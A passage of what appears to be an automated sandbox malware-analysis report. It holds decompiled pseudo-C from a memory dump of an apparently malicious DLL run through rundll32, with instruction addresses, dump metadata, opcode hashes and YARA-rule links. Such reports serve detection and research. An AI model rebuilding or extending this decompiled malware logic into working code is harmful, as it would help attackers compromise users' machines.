					_t84 =  *0x46bd32c; // 0x50295b0
					__imp__(_t84 + 0x40);
					_t86 =  *0x46bd32c; // 0x50295b0
					_t143 = E046B8307(1, _t138, _a16,  *_t86);
					_v28 = _t143;
					asm("lock xadd [eax], ecx");
					if(_t143 == 0) {
						L24:
						 *_t128( *0x46bd238, _t147, _v8);
						goto L25;
					}
					 *0x46bd104(_t143, 0x46bc2ac);
					_push(_t143);
					_t92 = E046B3CC8();
					_v16 = _t92;
					if(_t92 == 0) {
						L23:
						 *_t128( *0x46bd238, _t147, _t143);
						goto L24;
					}
					_t148 = __imp__; // 0x75188170
					 *_t148(_t143, _a4);
					 *_t148(_v8, _v20);
					_t149 = __imp__; // 0x751881d0
					 *_t149(_v8, _v16);
					 *_t149(_v8, _t143);
					_t99 = E046B809F(0, _v8);
					_a4 = _t99;
					if(_t99 == 0) {
						_v12 = 8;
						L21:
						E046BA1B0();
						L22:
						 *_t128( *0x46bd238, 0, _v16);
						_t147 = 0;
						goto L23;
					}
					_t103 = E046B43DF(_t128, 0xffffffffffffffff, _t143,  &_v24); // executed
					_v12 = _t103;
					if(_t103 == 0) {
						_t152 = _v24;
						_t107 = E046B163F(_t152, _a4, _a8, _a12); // executed
						_v12 = _t107;
						_t108 =  *((intOrPtr*)(_t152 + 8));
						 *((intOrPtr*)( *_t108 + 0x80))(_t108);
						_t110 =  *((intOrPtr*)(_t152 + 8));
						 *((intOrPtr*)( *_t110 + 8))(_t110);
						_t112 =  *((intOrPtr*)(_t152 + 4));
						 *((intOrPtr*)( *_t112 + 8))(_t112);
						_t114 =  *_t152;
						_t103 = E046B9039( *((intOrPtr*)( *_t114 + 8))(_t114), _t152);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t103 = _a8;
							if(_t103 != 0) {
								_t144 =  *_t103;
								_t150 =  *_a12;
								_push( *_a12);
								_push(_t144);
								_push(_t144);
								L046B8F0A();
								_t103 = E046B85DB(_t144, _t144, _t150 >> 1);
								_t143 = _v28;
								 *_a12 = _t103;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E046B9039(_t103, _a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}




















































                                                  0x046b8b94
                                                  0x046b8b94
                                                  0x046b8b94
                                                  0x046b8b9f
                                                  0x046b8ba6
                                                  0x046b8ba8
                                                  0x046b8ba8
                                                  0x046b8bb5
                                                  0x046b8bc0
                                                  0x046b8bc3
                                                  0x046b8bc8
                                                  0x046b8bcb
                                                  0x046b8bd1
                                                  0x046b8bd4
                                                  0x046b8bd9
                                                  0x046b8bdc
                                                  0x046b8be1
                                                  0x046b8be4
                                                  0x046b8bf0
                                                  0x046b8bfd
                                                  0x046b8c05
                                                  0x046b8c0a
                                                  0x046b8c15
                                                  0x046b8c17
                                                  0x046b8c1a
                                                  0x046b8c1c
                                                  0x046b8c23
                                                  0x046b8c29
                                                  0x046b8c2c
                                                  0x046b8c2f
                                                  0x046b8c34
                                                  0x046b8c41
                                                  0x046b8c43
                                                  0x046b8c49
                                                  0x046b8c53
                                                  0x046b8c53
                                                  0x046b8c55
                                                  0x046b8c5c
                                                  0x046b8c5f
                                                  0x046b8c62
                                                  0x046b8c67
                                                  0x046b8c74
                                                  0x046b8c76
                                                  0x046b8c84
                                                  0x046b8c84
                                                  0x046b8c86
                                                  0x046b8c94
                                                  0x046b8c99
                                                  0x046b8c9d
                                                  0x046b8ca0
                                                  0x046b8e63
                                                  0x046b8e6d
                                                  0x046b8e76
                                                  0x046b8ca6
                                                  0x046b8cb2
                                                  0x046b8cba
                                                  0x046b8cbd
                                                  0x046b8e57
                                                  0x046b8e61
                                                  0x00000000
                                                  0x046b8e61
                                                  0x046b8cc3
                                                  0x046b8cc9
                                                  0x046b8cce
                                                  0x046b8cd7
                                                  0x046b8ce8
                                                  0x046b8cec
                                                  0x046b8cf5
                                                  0x046b8cfb
                                                  0x046b8d0a
                                                  0x046b8d11
                                                  0x046b8d1a
                                                  0x046b8d20
                                                  0x046b8e4b
                                                  0x046b8e55
                                                  0x00000000
                                                  0x046b8e55
                                                  0x046b8d2c
                                                  0x046b8d32
                                                  0x046b8d33
                                                  0x046b8d3a
                                                  0x046b8d3d
                                                  0x046b8e41
                                                  0x046b8e49
                                                  0x00000000
                                                  0x046b8e49
                                                  0x046b8d46
                                                  0x046b8d4d
                                                  0x046b8d55
                                                  0x046b8d5a
                                                  0x046b8d63
                                                  0x046b8d69
                                                  0x046b8d70
                                                  0x046b8d77
                                                  0x046b8d7a
                                                  0x046b8e79
                                                  0x046b8e2d
                                                  0x046b8e2d
                                                  0x046b8e32
                                                  0x046b8e3d
                                                  0x046b8e3f
                                                  0x00000000
                                                  0x046b8e3f
                                                  0x046b8d84
                                                  0x046b8d8b
                                                  0x046b8d8e
                                                  0x046b8d93
                                                  0x046b8d9e
                                                  0x046b8da3
                                                  0x046b8da6
                                                  0x046b8dac
                                                  0x046b8db2
                                                  0x046b8db8
                                                  0x046b8dbb
                                                  0x046b8dc1
                                                  0x046b8dc4
                                                  0x046b8dcd
                                                  0x046b8dcd
                                                  0x046b8dd9
                                                  0x046b8de5
                                                  0x046b8de9
                                                  0x046b8deb
                                                  0x046b8df0
                                                  0x046b8df2
                                                  0x046b8df7
                                                  0x046b8df9
                                                  0x046b8dfa
                                                  0x046b8dfb
                                                  0x046b8dfc
                                                  0x046b8e09
                                                  0x046b8e11
                                                  0x046b8e14
                                                  0x046b8e14
                                                  0x046b8df0
                                                  0x00000000
                                                  0x046b8ddb
                                                  0x046b8ddf
                                                  0x046b8e16
                                                  0x046b8e19
                                                  0x046b8e22
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x046b8e22
                                                  0x046b8de1
                                                  0x00000000
                                                  0x046b8de1
                                                  0x046b8dd9

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8248005f97500eb6e79447e69e5ba9b34dc02af34978f36dbaa7e3207d10c3bd
                                                  • Instruction ID: b5ea17e68d73420855462f3f9ead44f1f79f1645d99364275ff5b5e798ce5a54
                                                  • Opcode Fuzzy Hash: 8248005f97500eb6e79447e69e5ba9b34dc02af34978f36dbaa7e3207d10c3bd
                                                  • Instruction Fuzzy Hash: 6B913971900208AFDB11EFA8DC84A9E7BB9EF48354F144059F944EB260E739ED91DBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B12D4, Relevance: .2, Instructions: 222COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bbdeda9d8844165047f5c588f7eaa565b412d1a036f31291e21dd2b71c4be79
                                                  • Instruction ID: 5fb07f447d9f0d10b083faf5136733fb575f49a171af623fd47f2b1c35115115
                                                  • Opcode Fuzzy Hash: 0bbdeda9d8844165047f5c588f7eaa565b412d1a036f31291e21dd2b71c4be79
                                                  • Instruction Fuzzy Hash: 90816CB2D00209EFDF21CFA5DC44AEEBBB9FB45340F00416AE545E6250E735AE84CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B225B, Relevance: .2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 29%
                                                  			E046B225B(signed int __edx) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				signed int _t32;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t45;
				intOrPtr _t47;
				intOrPtr* _t49;
				signed int _t51;
				signed char _t53;
				intOrPtr _t55;
				signed int _t56;
				intOrPtr _t59;
				signed int _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t65;

				_t58 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E046B550E();
				if(_t21 != 0) {
					_t56 =  *0x46bd25c; // 0x4000000a
					_t52 = (_t56 & 0xf0000000) + _t21;
					 *0x46bd25c = (_t56 & 0xf0000000) + _t21;
				}
				_t22 =  *0x46bd164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E046B3D0D( &_v8,  &_v20); // executed
					_t51 = _t25;
					_t26 =  *0x46bd27c; // 0x96a5a8
					if( *0x46bd25c > 5) {
						_t8 = _t26 + 0x46be5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x46bea15; // 0x44283a44
						_t27 = _t7;
					}
					E046B1BF4(_t27, _t27);
					_t31 = E046B1B2F(_t58,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						__imp__(_v20);
					}
					_t59 = 5;
					if(_t51 != _t59) {
						 *0x46bd270 =  *0x46bd270 ^ 0x81bbe65d;
						_t32 = E046B2049(_t31, 0x60);
						__eflags = _t32;
						 *0x46bd32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							L046BA7BC();
							_t47 =  *0x46bd32c; // 0x50295b0
							_t65 = _t65 + 0xc;
							__imp__(_t47 + 0x40, _t32, 0, 0x60);
							_t49 =  *0x46bd32c; // 0x50295b0
							 *_t49 = 0x46be836;
						}
						__eflags = 0;
						_t51 = 0;
						if(0 == 0) {
							__imp__( *0x46bd238, 0, 0x43);
							__eflags = 0;
							 *0x46bd2c4 = 0;
							if(0 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t53 =  *0x46bd25c; // 0x4000000a
								_t58 = _t53 & 0x000000ff;
								_t55 =  *0x46bd27c; // 0x96a5a8
								_t13 = _t55 + 0x46be55a; // 0x697a6f4d
								_t52 = _t13;
								 *0x46bd120(0, _t13, _t53 & 0x000000ff, _t53 & 0x000000ff, 0x46bc2a7);
							}
							__eflags = 0;
							_t51 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E046B269C( ~_v8 &  *0x46bd270, 0x46bd00c); // executed
								_t41 = E046B4094(_t52); // executed
								_t51 = _t41;
								__eflags = _t51;
								if(_t51 != 0) {
									goto L30;
								}
								_t42 = E046B96A4(_t52); // executed
								__eflags = _t42;
								if(_t42 != 0) {
									__eflags = _v8;
									_t62 = _v12;
									if(_v8 != 0) {
										L29:
										_t43 = E046B6786(_t58, _t62, _v8); // executed
										_t51 = _t43;
										goto L30;
									}
									__eflags = _t62;
									if(__eflags == 0) {
										goto L30;
									}
									_t45 = E046B3DD9(__eflags, _t62 + 4); // executed
									_t51 = _t45;
									__eflags = _t51;
									if(_t51 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t51 = 8;
							}
						}
					} else {
						_t63 = _v12;
						if(_t63 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x46bd160();
							}
							goto L34;
						}
						_t64 = _t63 + 4;
						do {
						} while (E046BA501(_t59, _t64, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t51 = _t22;
					L34:
					return _t51;
				}
			}































                                                  0x046b225b
                                                  0x046b2266
                                                  0x046b2269
                                                  0x046b226c
                                                  0x046b226f
                                                  0x046b2276
                                                  0x046b2278
                                                  0x046b2284
                                                  0x046b2286
                                                  0x046b2286
                                                  0x046b228f
                                                  0x046b2297
                                                  0x046b229a
                                                  0x046b22b4
                                                  0x046b22c0
                                                  0x046b22c2
                                                  0x046b22c7
                                                  0x046b22d1
                                                  0x046b22d1
                                                  0x046b22c9
                                                  0x046b22c9
                                                  0x046b22c9
                                                  0x046b22c9
                                                  0x046b22d8
                                                  0x046b22e5
                                                  0x046b22ec
                                                  0x046b22f1
                                                  0x046b22f1
                                                  0x046b22f9
                                                  0x046b22fc
                                                  0x046b2322
                                                  0x046b232e
                                                  0x046b2333
                                                  0x046b2335
                                                  0x046b233a
                                                  0x046b2366
                                                  0x046b2368
                                                  0x046b233c
                                                  0x046b2340
                                                  0x046b2345
                                                  0x046b234a
                                                  0x046b2351
                                                  0x046b2357
                                                  0x046b235c
                                                  0x046b2362
                                                  0x046b2369
                                                  0x046b236b
                                                  0x046b236d
                                                  0x046b237c
                                                  0x046b2382
                                                  0x046b2384
                                                  0x046b2389
                                                  0x046b23b9
                                                  0x046b23bb
                                                  0x046b238b
                                                  0x046b238b
                                                  0x046b2391
                                                  0x046b239e
                                                  0x046b23a4
                                                  0x046b23a4
                                                  0x046b23ac
                                                  0x046b23b5
                                                  0x046b23bc
                                                  0x046b23be
                                                  0x046b23c0
                                                  0x046b23c7
                                                  0x046b23d4
                                                  0x046b23d9
                                                  0x046b23de
                                                  0x046b23e0
                                                  0x046b23e2
                                                  0x00000000
                                                  0x00000000
                                                  0x046b23e4
                                                  0x046b23e9
                                                  0x046b23eb
                                                  0x046b23f2
                                                  0x046b23f6
                                                  0x046b23f9
                                                  0x046b240e
                                                  0x046b2412
                                                  0x046b2417
                                                  0x00000000
                                                  0x046b2417
                                                  0x046b23fb
                                                  0x046b23fd
                                                  0x00000000
                                                  0x00000000
                                                  0x046b2403
                                                  0x046b2408
                                                  0x046b240a
                                                  0x046b240c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x046b240c
                                                  0x046b23ef
                                                  0x046b23ef
                                                  0x046b23c0
                                                  0x046b22fe
                                                  0x046b22fe
                                                  0x046b2303
                                                  0x046b2419
                                                  0x046b241d
                                                  0x046b2425
                                                  0x046b2425
                                                  0x00000000
                                                  0x046b241d
                                                  0x046b2309
                                                  0x046b230c
                                                  0x046b2316
                                                  0x046b231d
                                                  0x00000000
                                                  0x046b242d
                                                  0x046b242d
                                                  0x046b2431
                                                  0x046b2435
                                                  0x046b2435

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d193c251ea12aff5df2090029ecc609de4a9af672547a5c75565451ea1b1773
                                                  • Instruction ID: aceef5da48bfe6d7e0fad2a833d522f9210e263385707cce1fb2cd855da323db
                                                  • Opcode Fuzzy Hash: 7d193c251ea12aff5df2090029ecc609de4a9af672547a5c75565451ea1b1773
                                                  • Instruction Fuzzy Hash: 3851C871A10315ABEB219FA4D868BDE37E8EB04704F0444AAE681DB340F678EDC48BD5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B3DD9, Relevance: .2, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E046B3DD9(void* __eflags, char _a4) {
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t60;
				void* _t70;
				intOrPtr _t75;

				_push(0x2c);
				_push(0);
				_push( &_v84);
				_v88 = 0;
				L046BA7BC();
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t39 =  *0x46bd27c; // 0x96a5a8
				_t5 = _t39 + 0x46bee40; // 0x410025
				_t41 = E046B6A12(_t5);
				_t75 = _t41;
				_v16 = _t75;
				if(_t75 == 0) {
					_t70 = 8;
					L24:
					return _t70;
				}
				__imp__(_t75);
				_t43 =  *0x46bd114(_t75, _a4, _t41); // executed
				if(_t43 != 0) {
					_t70 = 1;
					L22:
					E046B9039(_t43, _v16);
					goto L24;
				}
				if(E046BA72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t43 = E046B809F(0,  *0x46bd33c);
				_v12 = _t43;
				if(_t43 == 0) {
					_t70 = 8;
					goto L19;
				} else {
					_t48 =  *0x46bd27c; // 0x96a5a8
					_t11 = _t48 + 0x46be81a; // 0x65696c43
					_t51 = E046B809F(0, _t11);
					_t77 = _t51;
					if(_t51 == 0) {
						_t70 = 8;
					} else {
						_t70 = E046B6BFA(_a4, 0x80000001, _v12, _t77,  &_v88,  &_v84);
						_t51 = E046B9039(_t68, _t77);
					}
					if(_t70 != 0) {
						L17:
						_t43 = E046B9039(_t51, _v12);
						L19:
						_t76 = _a4;
						if(_a4 != 0) {
							_t43 = E046B1F99(_t76);
						}
						goto L22;
					} else {
						if(( *0x46bd260 & 0x00000001) == 0) {
							L14:
							E046B8F83(_t70, _v88, _v84,  *0x46bd270, 0);
							_t70 = E046B1C74(_v88,  &_v80,  &_v76, 0);
							if(_t70 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t70 = E046B42EA( &_v40, 0);
							}
							_t51 = E046B9039(_t56, _v88);
							goto L17;
						}
						_t60 =  *0x46bd27c; // 0x96a5a8
						_t18 = _t60 + 0x46be823; // 0x65696c43
						_t51 = E046B809F(0, _t18);
						_t79 = _t51;
						if(_t51 == 0) {
							_t70 = 8;
						} else {
							_t70 = E046B6BFA(_a4, 0x80000001, _v12, _t79,  &_v72,  &_v68);
							_t51 = E046B9039(_t65, _t79);
						}
						if(_t70 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

























                                                  0x046b3de4
                                                  0x046b3de9
                                                  0x046b3dea
                                                  0x046b3deb
                                                  0x046b3dee
                                                  0x046b3df5
                                                  0x046b3dfb
                                                  0x046b3dfc
                                                  0x046b3dfd
                                                  0x046b3dfe
                                                  0x046b3dff
                                                  0x046b3e00
                                                  0x046b3e08
                                                  0x046b3e0f
                                                  0x046b3e14
                                                  0x046b3e18
                                                  0x046b3e1b
                                                  0x046b3f6b
                                                  0x046b3f6e
                                                  0x046b3f72
                                                  0x046b3f72
                                                  0x046b3e22
                                                  0x046b3e2d
                                                  0x046b3e35
                                                  0x046b3f5e
                                                  0x046b3f5f
                                                  0x046b3f62
                                                  0x00000000
                                                  0x046b3f62
                                                  0x046b3e47
                                                  0x046b3e49
                                                  0x046b3e49
                                                  0x046b3e54
                                                  0x046b3e5b
                                                  0x046b3e5e
                                                  0x046b3f4d
                                                  0x00000000
                                                  0x046b3e64
                                                  0x046b3e64
                                                  0x046b3e69
                                                  0x046b3e72
                                                  0x046b3e77
                                                  0x046b3e80
                                                  0x046b3ea3
                                                  0x046b3e82
                                                  0x046b3e98
                                                  0x046b3e9a
                                                  0x046b3e9a
                                                  0x046b3ea6
                                                  0x046b3f41
                                                  0x046b3f44
                                                  0x046b3f4e
                                                  0x046b3f4e
                                                  0x046b3f53
                                                  0x046b3f55
                                                  0x046b3f55
                                                  0x00000000
                                                  0x046b3eac
                                                  0x046b3eb3
                                                  0x046b3ef4
                                                  0x046b3f05
                                                  0x046b3f1b
                                                  0x046b3f1f
                                                  0x046b3f24
                                                  0x046b3f2a
                                                  0x046b3f37
                                                  0x046b3f37
                                                  0x046b3f3c
                                                  0x00000000
                                                  0x046b3f3c
                                                  0x046b3eb5
                                                  0x046b3eba
                                                  0x046b3ec3
                                                  0x046b3ec8
                                                  0x046b3ecc
                                                  0x046b3eef
                                                  0x046b3ece
                                                  0x046b3ee4
                                                  0x046b3ee6
                                                  0x046b3ee6
                                                  0x046b3ef2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x046b3ef2
                                                  0x046b3ea6

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 23b011ae4db412037c07dc342a6cc88521b26e85b0ddd29c107451d0063d101f
                                                  • Instruction ID: 61cfdfceac9b1e8a8b732b26876311d04481ac54ac79c776d18aec719dd70aa2
                                                  • Opcode Fuzzy Hash: 23b011ae4db412037c07dc342a6cc88521b26e85b0ddd29c107451d0063d101f
                                                  • Instruction Fuzzy Hash: 52413371A01218AAEB11AFF4DC84DDE7BBDEF08744B00412AEA45EB211F675EDC587D4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B163F, Relevance: .2, Instructions: 152COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5029edcf33e8bb36352b5a65ebc0e601b8e2aa2e1d37099cf14eac4a98003686
                                                  • Instruction ID: 0ed07dd42d000b9b56e647c0b9343541c9638c07f822c028bd15244169d53c92
                                                  • Opcode Fuzzy Hash: 5029edcf33e8bb36352b5a65ebc0e601b8e2aa2e1d37099cf14eac4a98003686
                                                  • Instruction Fuzzy Hash: 8D512E76910209BFDB10DFA4C8948EEB7B6FF89340B148879E945EB210E775AD85CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046B6786, Relevance: .2, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 21%
                                                  			E046B6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v88;
				char _v92;
				char* _t44;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t51;
				char _t55;
				intOrPtr _t59;
				signed int _t60;
				void* _t63;
				intOrPtr* _t64;
				void* _t65;
				signed int _t66;
				intOrPtr _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				void* _t75;

				_t44 =  &_v88;
				_v92 = 0;
				L046BA7BC();
				__imp__(0, 1, 0, _t44, 0, 0x2c);
				_v44 = _t44;
				if(_t44 == 0) {
					__imp__();
					_v8 = _t44;
				} else {
					_v20 = 0;
					_v16 = 0;
					L046BB0C8();
					_t72 = __imp__; // 0x7519f710
					_v36 = _t44;
					_v32 = __edx;
					 *_t72(_v44,  &_v36, 0, 0, 0, 0,  *0x46bd240, 0, 0xff676980, 0xffffffff);
					_t48 =  *0x46bd26c; // 0x2c8
					_t64 = __imp__; // 0x7519f730
					_v40 = _t48;
					_t50 =  *_t64(2,  &_v44, 0, 0xffffffff);
					_v8 = _t50;
					if(_t50 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x46bd24c = 5;
						} else {
							_t63 = E046B73FD(__edx); // executed
							if(_t63 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x46bd260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t66 = _v12;
						_t53 = _t66 << 4;
						_t71 = _t75 + (_t66 << 4) - 0x54;
						_t67 = _t66 + 1;
						_v24 = _t66 + 1;
						_t55 = E046B8504(_t75 + _t53 - 0x58, _t66 + 1, _t67, _t75 + _t53 - 0x58, _t71,  &_v20,  &_v16); // executed
						_v8 = _t55;
						if(_t55 != 0) {
							goto L17;
						}
						_t60 = _v24;
						_t85 = _t60 - 3;
						_v12 = _t60;
						if(_t60 != 3) {
							goto L6;
						} else {
							_v8 = E046B3BF1(_t67, _t85,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t55 - 0x10d2;
						if(_t55 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x46bd244);
							goto L21;
						} else {
							__eflags =  *0x46bd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t55 = E046BA1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x46bd248);
								L21:
								L046BB0C8();
								_v36 = _t55;
								_v32 = _t71;
								 *_t72(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t59 =  *_t64(2,  &_v44, 0, 0xffffffff);
								__eflags = _t59;
								_v8 = _t59;
								if(_t59 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t73 =  &_v92;
					_t65 = 3;
					do {
						_t51 =  *_t73;
						if(_t51 != 0) {
							__imp__( *0x46bd238, 0, _t51);
						}
						_t73 = _t73 + 0x10;
						_t65 = _t65 - 1;
					} while (_t65 != 0);
					__imp__(_v44);
				}
				return _v8;
				goto L25;
			}





























                                                  0x046b6793
                                                  0x046b6798
                                                  0x046b679b
                                                  0x046b67a7
                                                  0x046b67af
                                                  0x046b67b2
                                                  0x046b6913
                                                  0x046b6919
                                                  0x046b67b8
                                                  0x046b67c6
                                                  0x046b67c9
                                                  0x046b67cc
                                                  0x046b67d1
                                                  0x046b67da
                                                  0x046b67e5
                                                  0x046b67e8
                                                  0x046b67ea
                                                  0x046b67ef
                                                  0x046b67f7
                                                  0x046b6801
                                                  0x046b6805
                                                  0x046b6808
                                                  0x046b680d
                                                  0x046b6818
                                                  0x046b6818
                                                  0x046b680f
                                                  0x046b680f
                                                  0x046b6816
                                                  0x00000000
                                                  0x00000000
                                                  0x046b6816
                                                  0x046b6822
                                                  0x00000000
                                                  0x046b6825
                                                  0x046b6829
                                                  0x046b6834
                                                  0x046b6834
                                                  0x046b683b
                                                  0x046b6844
                                                  0x046b684b
                                                  0x046b6854
                                                  0x046b6857
                                                  0x046b685a
                                                  0x046b6861
                                                  0x046b6864
                                                  0x00000000
                                                  0x00000000
                                                  0x046b6866
                                                  0x046b6869
                                                  0x046b686c
                                                  0x046b686f
                                                  0x00000000
                                                  0x046b6871
                                                  0x046b6880
                                                  0x046b6880
                                                  0x00000000
                                                  0x046b68ae
                                                  0x046b68ae
                                                  0x046b68b3
                                                  0x046b68d2
                                                  0x046b68d4
                                                  0x046b68d9
                                                  0x046b68da
                                                  0x00000000
                                                  0x046b68b5
                                                  0x046b68b5
                                                  0x046b68bb
                                                  0x00000000
                                                  0x046b68bd
                                                  0x046b68bd
                                                  0x046b68c2
                                                  0x046b68c4
                                                  0x046b68c9
                                                  0x046b68ca
                                                  0x046b68e0
                                                  0x046b68e0
                                                  0x046b68e8
                                                  0x046b68f3
                                                  0x046b68f6
                                                  0x046b6901
                                                  0x046b6903
                                                  0x046b6905
                                                  0x046b6908
                                                  0x00000000
                                                  0x046b690e
                                                  0x00000000
                                                  0x046b690e
                                                  0x046b6908
                                                  0x046b68bb
                                                  0x00000000
                                                  0x046b68b3
                                                  0x046b6883
                                                  0x046b6885
                                                  0x046b6888
                                                  0x046b6889
                                                  0x046b6889
                                                  0x046b688d
                                                  0x046b6897
                                                  0x046b6897
                                                  0x046b689d
                                                  0x046b68a0
                                                  0x046b68a0
                                                  0x046b68a6
                                                  0x046b68a6
                                                  0x046b6923
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
